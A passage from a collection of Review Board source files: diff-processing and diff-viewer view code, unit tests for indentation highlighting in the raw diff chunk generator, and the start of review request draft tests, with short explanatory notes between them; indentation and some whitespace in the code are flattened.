source_file=parser.normalize_diff_filename(orig_file),
dest_file=parser.normalize_diff_filename(dest_file),
source_revision=smart_unicode(orig_rev),
dest_detail=f.newInfo,
binary=f.binary,
status=status)
if (parent_file and
(parent_file.moved or parent_file.copied) and
parent_file.insert_count == 0 and
parent_file.delete_count == 0):
filediff.extra_data = {'parent_moved': True}
if not validate_only:
# This state all requires making modifications to the database.
# We only want to do this if we're saving.
filediff.diff = f.data
filediff.parent_diff = parent_content
filediff.set_line_counts(raw_insert_count=f.insert_count,
raw_delete_count=f.delete_count)
filediffs.append(filediff)
if validate_only:
return None
if filediffs:
FileDiff.objects.bulk_create(filediffs)
return diffset
def _normalize_filename(self, filename, basedir):
"""Normalize a file name to be relative to the repository root."""
if filename.startswith('/'):
return filename
return os.path.join(basedir, filename).replace('\\', '/')
def _process_files(self, parser, basedir, repository, base_commit_id,
request, check_existence=False, limit_to=None):
tool = repository.get_scmtool()
for f in parser.parse():
source_filename, source_revision = tool.parse_diff_revision(
f.origFile,
f.origInfo,
moved=f.moved,
copied=f.copied)
dest_filename = self._normalize_filename(f.newFile, basedir)
source_filename = self._normalize_filename(source_filename,
basedir)
if limit_to is not None and dest_filename not in limit_to:
# This file isn't actually needed for the diff, so save
# ourselves a remote file existence check and some storage.
continue
# FIXME: this would be a good place to find permissions errors
if (source_revision != PRE_CREATION and
source_revision != UNKNOWN and
not f.binary and
not f.deleted and
not f.moved and
not f.copied and
(check_existence and
not repository.get_file_exists(source_filename,
source_revision,
base_commit_id=base_commit_id,
request=request))):
raise FileNotFoundError(source_filename, source_revision,
base_commit_id)
f.origFile = source_filename
f.origInfo = source_revision
f.newFile = dest_filename
yield f
def _compare_files(self, filename1, filename2):
"""
Compares two files, giving precedence to header files over source
files. This allows the resulting list of files to be more
intelligently sorted.
"""
if filename1.find('.') != -1 and filename2.find('.') != -1:
basename1, ext1 = filename1.rsplit('.', 1)
basename2, ext2 = filename2.rsplit('.', 1)
if basename1 == basename2:
if (ext1 in self.HEADER_EXTENSIONS and
ext2 in self.IMPL_EXTENSIONS):
return -1
elif (ext1 in self.IMPL_EXTENSIONS and
ext2 in self.HEADER_EXTENSIONS):
return 1
return cmp(filename1, filename2)
```
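A sketch of how the migration helpers above might be driven from a maintenance script, assuming `FileDiffManager` is installed as `FileDiff.objects` (as its docstring implies); the progress callback is illustrative only:
```python
from reviewboard.diffviewer.models import FileDiff

counts = FileDiff.objects.get_migration_counts()
print('%d items need migration' % counts['total_count'])

def print_progress(migrated, total):
    # Called after each processed batch with cumulative progress.
    print('Migrated %d of %d' % (migrated, total))

if counts['total_count'] > 0:
    result = FileDiff.objects.migrate_all(batch_done_cb=print_progress,
                                          counts=counts)
    print('Saved %d bytes' % result['bytes_saved'])
```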
#### File: diffviewer/tests/test_raw_diff_chunk_generator.py
```python
from __future__ import unicode_literals
from reviewboard.diffviewer.chunk_generator import RawDiffChunkGenerator
from reviewboard.testing import TestCase
class RawDiffChunkGeneratorTests(TestCase):
"""Unit tests for RawDiffChunkGenerator."""
@property
def generator(self):
"""Create a dummy generator for tests that need it.
This generator will be void of any content. It's intended for
use in tests that need to operate on its utility functions.
"""
return RawDiffChunkGenerator('', '', '', '')
def test_get_chunks(self):
"""Testing RawDiffChunkGenerator.get_chunks"""
old = (
b'This is line 1\n'
b'Another line\n'
b'Line 3.\n'
b'la de da.\n'
)
new = (
b'This is line 1\n'
b'Line 3.\n'
b'la de doo.\n'
)
generator = RawDiffChunkGenerator(old, new, 'file1', 'file2')
chunks = list(generator.get_chunks())
self.assertEqual(len(chunks), 4)
self.assertEqual(chunks[0]['change'], 'equal')
self.assertEqual(chunks[1]['change'], 'delete')
self.assertEqual(chunks[2]['change'], 'equal')
self.assertEqual(chunks[3]['change'], 'replace')
def test_get_move_info_with_new_range_no_preceding(self):
"""Testing RawDiffChunkGenerator._get_move_info with new move range and
no adjacent preceding move range
"""
generator = RawDiffChunkGenerator([], [], 'file1', 'file2')
self.assertEqual(
generator._get_move_info(10, {
8: 100,
10: 200,
11: 201,
}),
(200, True))
def test_get_move_info_with_new_range_preceding(self):
"""Testing RawDiffChunkGenerator._get_move_info with new move range and
adjacent preceding move range
"""
generator = RawDiffChunkGenerator([], [], 'file1', 'file2')
self.assertEqual(
generator._get_move_info(10, {
8: 100,
9: 101,
10: 200,
11: 201,
}),
(200, True))
def test_get_move_info_with_existing_range(self):
"""Testing RawDiffChunkGenerator._get_move_info with existing move
range
"""
generator = RawDiffChunkGenerator([], [], 'file1', 'file2')
self.assertEqual(
generator._get_move_info(11, {
8: 100,
9: 101,
10: 200,
11: 201,
}),
(201, False))
def test_get_move_info_with_no_move(self):
"""Testing RawDiffChunkGenerator._get_move_info with no move range"""
generator = RawDiffChunkGenerator([], [], 'file1', 'file2')
self.assertIsNone(generator._get_move_info(500, {
8: 100,
9: 101,
10: 200,
11: 201,
}))
def test_indent_spaces(self):
"""Testing RawDiffChunkGenerator._serialize_indentation with spaces"""
self.assertEqual(
self.generator._serialize_indentation(' ', 4),
('>>>>', ''))
def test_indent_tabs(self):
"""Testing RawDiffChunkGenerator._serialize_indentation with tabs"""
self.assertEqual(
self.generator._serialize_indentation('\t', 8),
('——————>|', ''))
def test_indent_spaces_and_tabs(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with spaces and tabs
"""
self.assertEqual(
self.generator._serialize_indentation(' \t', 8),
('>>>———>|', ''))
def test_indent_tabs_and_spaces(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with tabs and spaces
"""
self.assertEqual(
self.generator._serialize_indentation('\t ', 11),
('——————>|>>>',
''))
def test_indent_9_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with 9 spaces and tab
"""
self.assertEqual(
self.generator._serialize_indentation(' \t', 8),
('>>>>>>>|', ''))
def test_indent_8_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with 8 spaces and tab
"""
self.assertEqual(
self.generator._serialize_indentation(' \t', 8),
('>>>>>>>|', ''))
def test_indent_7_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with 7 spaces and tab
"""
self.assertEqual(
self.generator._serialize_indentation(' \t', 8),
('>>>>>—>|', ''))
def test_unindent_spaces(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation with spaces
"""
self.assertEqual(
self.generator._serialize_unindentation(' ', 4),
('<<<<', ''))
def test_unindent_tabs(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation with tabs"""
self.assertEqual(
self.generator._serialize_unindentation('\t', 8),
('|<——————', ''))
def test_unindent_spaces_and_tabs(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with spaces and tabs
"""
self.assertEqual(
self.generator._serialize_unindentation(' \t', 8),
('<<<|<———', ''))
def test_unindent_tabs_and_spaces(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with tabs and spaces
"""
self.assertEqual(
self.generator._serialize_unindentation('\t ', 11),
('|<——————<<<',
''))
def test_unindent_9_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with 9 spaces and tab
"""
self.assertEqual(
self.generator._serialize_unindentation(' \t', 8),
('<<<<<<<|', ''))
def test_unindent_8_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with 8 spaces and tab
"""
self.assertEqual(
self.generator._serialize_unindentation(' \t', 8),
('<<<<<<|<', ''))
def test_unindent_7_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with 7 spaces and tab
"""
self.assertEqual(
self.generator._serialize_unindentation(' \t', 8),
('<<<<<|<—', ''))
def test_highlight_indent(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with indentation
"""
self.assertEqual(
self.generator._highlight_indentation(
'',
' foo',
True, 4, 4),
('', '<span class="indent">>>>></span> foo'))
def test_highlight_indent_with_adjacent_tag(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with indentation and adjacent tag wrapping whitespace
"""
self.assertEqual(
self.generator._highlight_indentation(
'',
'<span class="s"> </span>foo',
True, 1, 1),
('',
'<span class="s"><span class="indent">></span></span>foo'))
def test_highlight_indent_with_unexpected_chars(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with indentation and unexpected markup chars
"""
self.assertEqual(
self.generator._highlight_indentation(
'',
' <span> </span> foo',
True, 4, 2),
('', ' <span> </span> foo'))
def test_highlight_unindent(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation
"""
self.assertEqual(
self.generator._highlight_indentation(
' foo',
'',
False, 4, 4),
('<span class="unindent"><<<<</span> foo', ''))
def test_highlight_unindent_with_adjacent_tag(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation and adjacent tag wrapping whitespace
"""
self.assertEqual(
self.generator._highlight_indentation(
'<span class="s"> </span>foo',
'',
False, 1, 1),
('<span class="s"><span class="unindent"><</span></span>foo',
''))
def test_highlight_unindent_with_unexpected_chars(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation and unexpected markup chars
"""
self.assertEqual(
self.generator._highlight_indentation(
' <span> </span> foo',
'',
False, 4, 2),
(' <span> </span> foo', ''))
def test_highlight_unindent_with_replacing_last_tab_with_spaces(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation and replacing last tab with spaces
"""
self.assertEqual(
self.generator._highlight_indentation(
'<span>\t\t </span> foo',
'',
False, 2, 16),
('<span><span class="unindent">'
'|<——————'
'|<——————'
'</span> </span> foo', ''))
def test_highlight_unindent_with_replacing_3_tabs_with_tab_spaces(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation and replacing 3 tabs with 1 tab and 8 spaces
"""
self.assertEqual(
self.generator._highlight_indentation(
'<span>\t </span> foo',
'',
False, 1, 24),
('<span><span class="unindent">'
'|<——————'
'</span> </span> foo', ''))
```
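A note on the indentation tests above: `_serialize_indentation()` replaces leading whitespace with visible markers, one `>` per space and, for each tab, a run of em-dashes ending in `>|` that reaches the next tab stop (unindentation mirrors this with `<` and `|<———`). The sketch below reproduces only that basic marker convention; `serialize_indent` is a hypothetical helper, not Review Board's method, and it deliberately ignores the extra normalization that the 7-, 8- and 9-spaces-plus-tab tests above exercise.

```python
# Minimal sketch of the indentation-marker convention (assumed helper,
# simple cases only; tab stops fixed at tab_size columns).


def serialize_indent(whitespace, tab_size=8):
    """Render leading whitespace as markers: '>' per space; each tab
    becomes em-dashes up to the next tab stop, ending in '>|'."""
    marked = ''
    column = 0

    for ch in whitespace:
        if ch == ' ':
            marked += '>'
            column += 1
        elif ch == '\t':
            width = tab_size - (column % tab_size)
            marked += u'\u2014' * (width - 2) + '>|'
            column += width

    return marked


# A full-width tab renders as six em-dashes plus '>|'.
assert serialize_indent('\t') == u'\u2014' * 6 + '>|'

# Spaces render one '>' each; a trailing tab fills to the next stop.
assert serialize_indent('    ') == '>>>>'
assert serialize_indent('   \t') == '>>>' + u'\u2014' * 3 + '>|'
```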
#### File: reviewboard/diffviewer/views.py
```python
from __future__ import unicode_literals
import logging
import os
import traceback
from zipfile import ZipFile
from django.conf import settings
from django.core.paginator import InvalidPage, Paginator
from django.http import (HttpResponse,
HttpResponseNotFound,
HttpResponseNotModified,
HttpResponseServerError,
Http404)
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from django.utils.six.moves import cStringIO as StringIO
from django.utils.translation import ugettext as _
from django.views.generic.base import TemplateView, View
from djblets.siteconfig.models import SiteConfiguration
from djblets.util.http import encode_etag, etag_if_none_match, set_etag
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import get_lexer_by_name
from reviewboard.diffviewer.diffutils import (get_diff_files,
get_enable_highlighting)
from reviewboard.diffviewer.errors import PatchError, UserVisibleError
from reviewboard.diffviewer.models import DiffSet, FileDiff
from reviewboard.diffviewer.renderers import (get_diff_renderer,
get_diff_renderer_class)
from reviewboard.site.urlresolvers import local_site_reverse
def get_collapse_diff(request):
if request.GET.get('expand', False):
return False
elif request.GET.get('collapse', False):
return True
elif 'collapsediffs' in request.COOKIES:
return (request.COOKIES['collapsediffs'] == "True")
else:
return True
class DiffViewerView(TemplateView):
"""Renders the main diff viewer.
This renders the diff viewer for a given DiffSet (or an interdiff
between two DiffSets). It handles loading information on the diffs,
generating the side-by-side view, and pagination.
The view expects the following parameters to be provided:
* diffset
- The DiffSet to render.
The following may also be provided:
* interdiffset
- A DiffSet object representing the other end of an interdiff range.
The following query parameters can be passed in on the URL:
* ?expand=1
- Expands all files within the diff viewer.
* ?collapse=1
- Collapses all files within the diff viewer, showing only
modifications and a few lines of context.
* ?file=<id>
- Renders only the FileDiff represented by the provided ID.
* ?page=<pagenum>
- Renders diffs found on the given page number, if the diff viewer
is paginated.
"""
template_name = 'diffviewer/view_diff.html'
fragment_error_template_name = 'diffviewer/diff_fragment_error.html'
def get(self, request, diffset, interdiffset=None, *args, **kwargs):
"""Handles GET requests for this view.
This will render the full diff viewer based on the provided
parameters.
The full rendering time will be logged.
If there's any exception thrown during rendering, an error page
with a traceback will be returned instead.
"""
self.collapse_diffs = get_collapse_diff(request)
if interdiffset:
logging.debug('Generating diff viewer page for interdiffset '
'ids %s-%s',
diffset.id, interdiffset.id, request=request)
else:
logging.debug('Generating diff viewer page for filediff id %s',
diffset.id, request=request)
try:
response = super(DiffViewerView, self).get(
request, diffset=diffset, interdiffset=interdiffset,
*args, **kwargs)
if interdiffset:
logging.debug('Done generating diff viewer page for '
'interdiffset ids %s-%s',
diffset.id, interdiffset.id, request=request)
else:
logging.debug('Done generating diff viewer page for filediff '
'id %s',
diffset.id, request=request)
return response
except Exception as e:
if interdiffset:
interdiffset_id = interdiffset.pk
else:
interdiffset_id = None
logging.exception('%s.get: Error rendering diff for diffset '
'ID=%s, interdiffset ID=%s: %s',
self.__class__.__name__,
diffset.pk,
interdiffset_id,
e,
request=request)
return exception_traceback(request, e, self.template_name)
def render_to_response(self, *args, **kwargs):
"""Renders the page to an HttpResponse.
This renders the diff viewer page, based on the context data
generated, and sets cookies before returning an HttpResponse to
the client.
"""
response = super(DiffViewerView, self).render_to_response(*args,
**kwargs)
response.set_cookie('collapsediffs', self.collapse_diffs)
return response
def get_context_data(self, diffset, interdiffset, extra_context={},
**kwargs):
"""Calculates and returns data used for rendering the diff viewer.
This handles all the hard work of generating the data backing the
side-by-side diff, handling pagination, and more. The data is
collected into a context dictionary and returned for rendering.
"""
files = get_diff_files(diffset=diffset,
interdiffset=interdiffset,
request=self.request)
# Break the list of files into pages
siteconfig = SiteConfiguration.objects.get_current()
paginator = Paginator(files,
siteconfig.get('diffviewer_paginate_by'),
siteconfig.get('diffviewer_paginate_orphans'))
page_num = int(self.request.GET.get('page', 1))
if self.request.GET.get('file', False):
file_id = int(self.request.GET['file'])
for i, f in enumerate(files):
if f['filediff'].pk == file_id:
page_num = i // paginator.per_page + 1
if page_num > paginator.num_pages:
page_num = paginator.num_pages
break
try:
page = paginator.page(page_num)
except InvalidPage:
page = paginator.page(paginator.num_pages)
diff_context = {
'revision': {
'revision': diffset.revision,
'is_interdiff': interdiffset is not None,
'interdiff_revision': (interdiffset.revision
if interdiffset else None),
},
'pagination': {
'is_paginated': page.has_other_pages(),
'current_page': page.number,
'pages': paginator.num_pages,
'page_numbers': paginator.page_range,
'has_next': page.has_next(),
'has_previous': page.has_previous(),
},
}
if page.has_next():
diff_context['pagination']['next_page'] = page.next_page_number()
if page.has_previous():
diff_context['pagination']['previous_page'] = \
page.previous_page_number()
context = dict({
'diff_context': diff_context,
'diffset': diffset,
'interdiffset': interdiffset,
'diffset_pair': (diffset, interdiffset),
'files': page.object_list,
'collapseall': self.collapse_diffs,
}, **extra_context)
return context
class DiffFragmentView(View):
"""Renders a fragment from a file in the diff viewer.
Based on the diffset data and other arguments provided, this will render
a fragment from a file in a diff. This may be the entire file, or some
chunk within.
The view expects the following parameters to be provided:
* diffset_or_id
- A DiffSet object or the ID for one.
* filediff_id
- The ID of a FileDiff within the DiffSet.
The following may also be provided:
* interdiffset_or_id
- A DiffSet object or the ID for one representing the other end of
an interdiff range.
* interfilediff_id
- A FileDiff ID for the other end of a revision range.
* chunk_index
- The index (0-based) of the chunk to render. If left out, the
entire file will be rendered.
Both ``filediff_id`` and ``interfilediff_id`` need to be available in the
URL (or otherwise passed to :py:meth:`get`). ``diffset_or_id`` and
``interdiffset_or_id`` are needed in :py:meth:`process_diff_info`, and
so must be passed either in the URL or in a subclass's definition of
that method.
The caller may also pass ``?lines-of-context=`` as a query parameter to
the URL to indicate how many lines of context should be provided around
the chunk.
"""
template_name = 'diffviewer/diff_file_fragment.html'
error_template_name = 'diffviewer/diff_fragment_error.html'
patch_error_template_name = 'diffviewer/diff_fragment_patch_error.html'
def get(self, request, *args, **kwargs):
"""Handle GET requests for this view.
This will create the renderer for the diff fragment, render it, and
return it.
If there's an error when rendering the diff fragment, an error page
will be rendered and returned instead.
Args:
request (django.http.HttpRequest):
The HTTP request.
*args (tuple):
Additional positional arguments for the view.
**kwargs (dict):
Additional keyword arguments for the view.
Returns:
django.http.HttpResponse:
A response containing the rendered fragment.
"""
filediff_id = kwargs.get('filediff_id')
interfilediff_id = kwargs.get('interfilediff_id')
chunk_index = kwargs.get('chunk_index')
try:
renderer_settings = self._get_renderer_settings(**kwargs)
etag = self.make_etag(renderer_settings, **kwargs)
if etag_if_none_match(request, etag):
return HttpResponseNotModified()
diff_info_or_response = self.process_diffset_info(**kwargs)
if isinstance(diff_info_or_response, HttpResponse):
return diff_info_or_response
except Http404:
raise
except Exception as e:
logging.exception('%s.get: Error when processing diffset info '
'for filediff ID=%s, interfilediff ID=%s, '
'chunk_index=%s: %s',
self.__class__.__name__,
filediff_id,
interfilediff_id,
chunk_index,
e,
request=request)
return exception_traceback(self.request, e,
self.error_template_name)
kwargs.update(diff_info_or_response)
try:
context = self.get_context_data(**kwargs)
renderer = self.create_renderer(
context=context,
renderer_settings=renderer_settings,
*args, **kwargs)
response = renderer.render_to_response(request)
except PatchError as e:
logging.warning(
'%s.get: PatchError when rendering diffset for filediff '
'ID=%s, interfilediff ID=%s, chunk_index=%s: %s',
self.__class__.__name__,
filediff_id,
interfilediff_id,
chunk_index,
e,
request=request)
url_kwargs = {
key: kwargs[key]
for key in ('chunk_index', 'interfilediff_id',
'review_request_id', 'filediff_id',
'revision', 'interdiff_revision')
if key in kwargs and kwargs[key] is not None
}
bundle_url = local_site_reverse('patch-error-bundle',
kwargs=url_kwargs,
request=request)
if e.rejects:
lexer = get_lexer_by_name('diff')
formatter = HtmlFormatter()
rejects = highlight(e.rejects, lexer, formatter)
else:
rejects = None
return HttpResponseServerError(render_to_string(
self.patch_error_template_name,
RequestContext(request, {
'bundle_url': bundle_url,
'file': diff_info_or_response['diff_file'],
'filename': os.path.basename(e.filename),
'patch_output': e.error_output,
'rejects': mark_safe(rejects),
})))
except Exception as e:
logging.exception(
'%s.get: Error when rendering diffset for filediff ID=%s, '
'interfilediff ID=%s, chunk_index=%s: %s',
self.__class__.__name__,
filediff_id,
interfilediff_id,
chunk_index,
e,
request=request)
return exception_traceback(
self.request, e, self.error_template_name,
extra_context={
'file': diff_info_or_response['diff_file'],
})
if response.status_code == 200:
set_etag(response, etag)
return response
def make_etag(self, renderer_settings, filediff_id,
interfilediff_id=None, **kwargs):
"""Return an ETag identifying this render.
Args:
renderer_settings (dict):
The settings determining how to render this diff.
The following keys are required: ``collapse_all`` and
``highlighting``.
The following key is optional: ``show_deleted``.
filediff_id (int):
The ID of the
:py:class:`~reviewboard.diffviewer.models.FileDiff` being
rendered.
interfilediff_id (int):
The ID of the
:py:class:`~reviewboard.diffviewer.models.FileDiff` on the
other side of the diff revision, if viewing an interdiff.
**kwargs (dict):
Additional keyword arguments passed to the function.
Returns:
unicode:
The encoded ETag identifying this render.
"""
etag = '%s:%s:%s:%s:%s:%s' % (
get_diff_renderer_class(),
renderer_settings['collapse_all'],
renderer_settings['highlighting'],
filediff_id,
interfilediff_id,
settings.TEMPLATE_SERIAL)
show_deleted = renderer_settings.get('show_deleted')
if show_deleted:
etag += ':%s' % show_deleted
return encode_etag(etag)
def process_diffset_info(self, diffset_or_id, filediff_id,
interfilediff_id=None, interdiffset_or_id=None,
**kwargs):
"""Process and return information on the desired diff.
The diff IDs and other data passed to the view can be processed and
converted into DiffSets. A dictionary with the DiffSet and FileDiff
information will be returned.
A subclass may instead return a HttpResponse to indicate an error
with the DiffSets.
"""
# Depending on whether we're invoked from a URL or from a wrapper
# with precomputed diffsets, we may be working with either IDs or
# actual objects. If they're objects, just use them as-is. Otherwise,
# if they're IDs, we want to grab them both (if both are provided)
# in one go, to save on an SQL query.
diffset = None
interdiffset = None
diffset_ids = []
if isinstance(diffset_or_id, DiffSet):
diffset = diffset_or_id
else:
diffset_ids.append(diffset_or_id)
if interdiffset_or_id:
if isinstance(interdiffset_or_id, DiffSet):
interdiffset = interdiffset_or_id
else:
diffset_ids.append(interdiffset_or_id)
if diffset_ids:
diffsets = DiffSet.objects.filter(pk__in=diffset_ids)
if len(diffsets) != len(diffset_ids):
raise Http404
for temp_diffset in diffsets:
if temp_diffset.pk == diffset_or_id:
diffset = temp_diffset
elif temp_diffset.pk == interdiffset_or_id:
interdiffset = temp_diffset
else:
assert False
filediff = get_object_or_404(FileDiff, pk=filediff_id, diffset=diffset)
if interfilediff_id:
interfilediff = get_object_or_404(FileDiff, pk=interfilediff_id,
diffset=interdiffset)
else:
interfilediff = None
# Store this so we don't end up causing an SQL query later when looking
# this up.
filediff.diffset = diffset
diff_file = self._get_requested_diff_file(diffset, filediff,
interdiffset, interfilediff)
if not diff_file:
raise UserVisibleError(
_('Internal error. Unable to locate file record for '
'filediff %s')
% filediff.pk)
return {
'diffset': diffset,
'interdiffset': interdiffset,
'filediff': filediff,
'diff_file': diff_file,
}
def create_renderer(self, context, renderer_settings, diff_file,
*args, **kwargs):
"""Creates the renderer for the diff.
This calculates all the state and data needed for rendering, and
constructs a DiffRenderer with that data. That renderer is then
returned, ready for rendering.
If there's an error in looking up the necessary information, this
may raise a UserVisibleError (best case), or some other form of
Exception.
"""
return get_diff_renderer(
diff_file,
extra_context=context,
template_name=self.template_name,
**renderer_settings)
def get_context_data(self, *args, **kwargs):
"""Returns context data used for rendering the view.
This can be overridden by subclasses to provide additional data for the
view.
"""
return {}
def _get_renderer_settings(self, chunk_index=None, **kwargs):
"""Calculate the render settings for the display of a diff.
This will calculate settings based on user preferences and URL
parameters. It does not calculate the state of any DiffSets or
FileDiffs.
"""
highlighting = get_enable_highlighting(self.request.user)
try:
lines_of_context = self.request.GET.get('lines-of-context', '')
lines_of_context = [int(i) for i in lines_of_context.split(',', 1)]
except (TypeError, ValueError):
lines_of_context = None
if chunk_index is not None:
try:
chunk_index = int(chunk_index)
except (TypeError, ValueError):
chunk_index = None
if lines_of_context:
collapse_all = True
elif chunk_index is not None:
# If we're currently expanding part of a chunk, we want to render
# the entire chunk without any lines collapsed. In the case of
# showing a range of lines, we're going to get all chunks and then
# only show the range. This is so that we won't have separate
# cached entries for each range.
collapse_all = False
else:
collapse_all = get_collapse_diff(self.request)
show_deleted = (self.request.GET.get('show-deleted') == '1')
return {
'chunk_index': chunk_index,
'collapse_all': collapse_all,
'highlighting': highlighting,
'lines_of_context': lines_of_context,
'show_deleted': show_deleted,
}
def _get_requested_diff_file(self, diffset, filediff, interdiffset,
interfilediff):
"""Fetches information on the requested diff.
This will look up information on the diff that's to be rendered
and return it, if found. It may also augment it with additional
data.
The file will not contain chunk information. That must be specifically
populated later.
"""
files = get_diff_files(diffset=diffset,
interdiffset=interdiffset,
filediff=filediff,
interfilediff=interfilediff,
request=self.request)
if files:
file = files[0]
if 'index' in self.request.GET:
try:
file['index'] = int(self.request.GET.get('index'))
except ValueError:
pass
return file
return None
class DownloadPatchErrorBundleView(DiffFragmentView):
"""A view to download the patch error bundle.
This view allows users to download a bundle containing data to help debug
issues when a patch fails to apply. The bundle will contain the diff, the
original file (as returned by the SCMTool), and the rejects file, if
applicable.
"""
def get(self, request, *args, **kwargs):
"""Handle GET requests for this view.
This will create the renderer for the diff fragment and render it in
order to get the PatchError information. It then returns a response
with a zip file containing all the debug data.
If no PatchError occurred, this will return a 404.
Args:
request (django.http.HttpRequest):
The HTTP request.
*args (tuple):
Additional positional arguments for the view.
**kwargs (dict):
Additional keyword arguments for the view.
Returns:
django.http.HttpResponse:
A response containing the data bundle.
"""
try:
renderer_settings = self._get_renderer_settings(**kwargs)
etag = self.make_etag(renderer_settings, **kwargs)
if etag_if_none_match(request, etag):
return HttpResponseNotModified()
diff_info_or_response = self.process_diffset_info(**kwargs)
if isinstance(diff_info_or_response, HttpResponse):
return diff_info_or_response
except Http404:
return HttpResponseNotFound()
except Exception as e:
logging.exception(
'%s.get: Error when processing diffset info for filediff '
'ID=%s, interfilediff ID=%s, chunk_index=%s: %s',
self.__class__.__name__,
kwargs.get('filediff_id'),
kwargs.get('interfilediff_id'),
kwargs.get('chunk_index'),
e,
request=request)
return HttpResponseServerError()
kwargs.update(diff_info_or_response)
try:
context = self.get_context_data(**kwargs)
renderer = self.create_renderer(
context=context,
renderer_settings=renderer_settings,
*args, **kwargs)
renderer.render_to_response(request)
except PatchError as e:
patch_error = e
except Exception as e:
logging.exception(
'%s.get: Error when rendering diffset for filediff ID=%s, '
'interfilediff ID=%s, chunk_index=%s: %s',
self.__class__.__name__,
kwargs.get('filediff_id'),
kwargs.get('interfilediff_id'),
kwargs.get('chunk_index'),
e,
request=request)
return HttpResponseServerError()
else:
return HttpResponseNotFound()
zip_data = StringIO()
with ZipFile(zip_data, 'w') as zipfile:
basename = os.path.basename(patch_error.filename)
zipfile.writestr('%s.orig' % basename, patch_error.orig_file)
zipfile.writestr('%s.diff' % basename, patch_error.diff)
if patch_error.rejects:
zipfile.writestr('%s.rej' % basename, patch_error.rejects)
if patch_error.new_file:
zipfile.writestr('%s.new' % basename, patch_error.new_file)
rsp = HttpResponse(zip_data.getvalue(),
content_type='application/zip')
rsp['Content-Disposition'] = \
'attachment; filename=%s.zip' % basename
return rsp
def exception_traceback_string(request, e, template_name, extra_context={}):
context = {'error': e}
context.update(extra_context)
if not isinstance(e, UserVisibleError):
context['trace'] = traceback.format_exc()
if request:
request_context = RequestContext(request, context)
else:
request_context = context
return render_to_string(template_name, request_context)
def exception_traceback(request, e, template_name, extra_context={}):
return HttpResponseServerError(
exception_traceback_string(request, e, template_name, extra_context))
```
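The `get_collapse_diff()` helper at the top of the views module resolves whether diffs start collapsed using a fixed precedence: `?expand=1` wins, then `?collapse=1`, then the `collapsediffs` cookie, and only then the default of collapsing. A minimal sketch of that precedence, using a stand-in request object so it runs without Django test setup (`FakeRequest` and `resolve_collapse` are illustrative names, not part of Review Board):

```python
class FakeRequest(object):
    """Stand-in carrying only the attributes get_collapse_diff() reads."""

    def __init__(self, GET=None, COOKIES=None):
        self.GET = GET or {}
        self.COOKIES = COOKIES or {}


def resolve_collapse(request):
    """Mirror the precedence used by get_collapse_diff() above."""
    if request.GET.get('expand', False):
        return False
    elif request.GET.get('collapse', False):
        return True
    elif 'collapsediffs' in request.COOKIES:
        return request.COOKIES['collapsediffs'] == 'True'
    else:
        return True


# ?expand=1 always wins, even if the cookie says to collapse.
assert resolve_collapse(FakeRequest(GET={'expand': '1'},
                                    COOKIES={'collapsediffs': 'True'})) is False

# The cookie is consulted only when neither query parameter is present.
assert resolve_collapse(FakeRequest(COOKIES={'collapsediffs': 'False'})) is False

# With no hints at all, diffs start collapsed.
assert resolve_collapse(FakeRequest()) is True
```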
#### File: reviews/tests/test_review_request_draft.py
```python
from __future__ import unicode_literals
import os
from django.contrib.auth.models import User
from kgb import SpyAgency
from reviewboard.accounts.models import Profile
from reviewboard.reviews.fields import (BaseEditableField,
BaseTextAreaField,
get_review_request_fieldset)
from reviewboard.reviews.models import ReviewRequest, ReviewRequestDraft
from reviewboard.scmtools.core import ChangeSet, Commit
from reviewboard.testing import TestCase
class ReviewRequestDraftTests(TestCase):
"""Unit tests for reviewboard.reviews.models.ReviewRequestDraft."""
fixtures = ['test_users', 'test_scmtools']
def test_draft_changes(self):
"""Testing recording of draft changes"""
draft = self._get_draft()
review_request = draft.review_request
old_summary = review_request.summary
old_description = review_request.description
old_testing_done = review_request.testing_done
old_branch = review_request.branch
old_bugs = review_request.get_bug_list()
draft.summary = 'New summary'
draft.description = 'New description'
draft.testing_done = 'New testing done'
draft.branch = 'New branch'
draft.bugs_closed = '12, 34, 56'
new_bugs = draft.get_bug_list()
changes = draft.publish()
fields = changes.fields_changed
self.assertIn('summary', fields)
self.assertIn('description', fields)
self.assertIn('testing_done', fields)
self.assertIn('branch', fields)
self.assertIn('bugs_closed', fields)
old_bugs_norm = set([(bug,) for bug in old_bugs])
new_bugs_norm = set([(bug,) for bug in new_bugs])
self.assertEqual(fields['summary']['old'][0], old_summary)
self.assertEqual(fields['summary']['new'][0], draft.summary)
self.assertEqual(fields['description']['old'][0], old_description)
self.assertEqual(fields['description']['new'][0], draft.description)
self.assertEqual(fields['testing_done']['old'][0], old_testing_done)
self.assertEqual(fields['testing_done']['new'][0], draft.testing_done)
self.assertEqual(fields['branch']['old'][0], old_branch)
self.assertEqual(fields['branch']['new'][0], draft.branch)
self.assertEqual(set(fields['bugs_closed']['old']), old_bugs_norm)
self.assertEqual(set(fields['bugs_closed']['new']), new_bugs_norm)
self.assertEqual(set(fields['bugs_closed']['removed']), old_bugs_norm)
self.assertEqual(set(fields['bugs_closed']['added']), new_bugs_norm)
def test_draft_changes_with_custom_fields(self):
"""Testing ReviewRequestDraft.publish with custom fields propagating
from draft to review request
"""
class RichField(BaseTextAreaField):
field_id = 'rich_field'
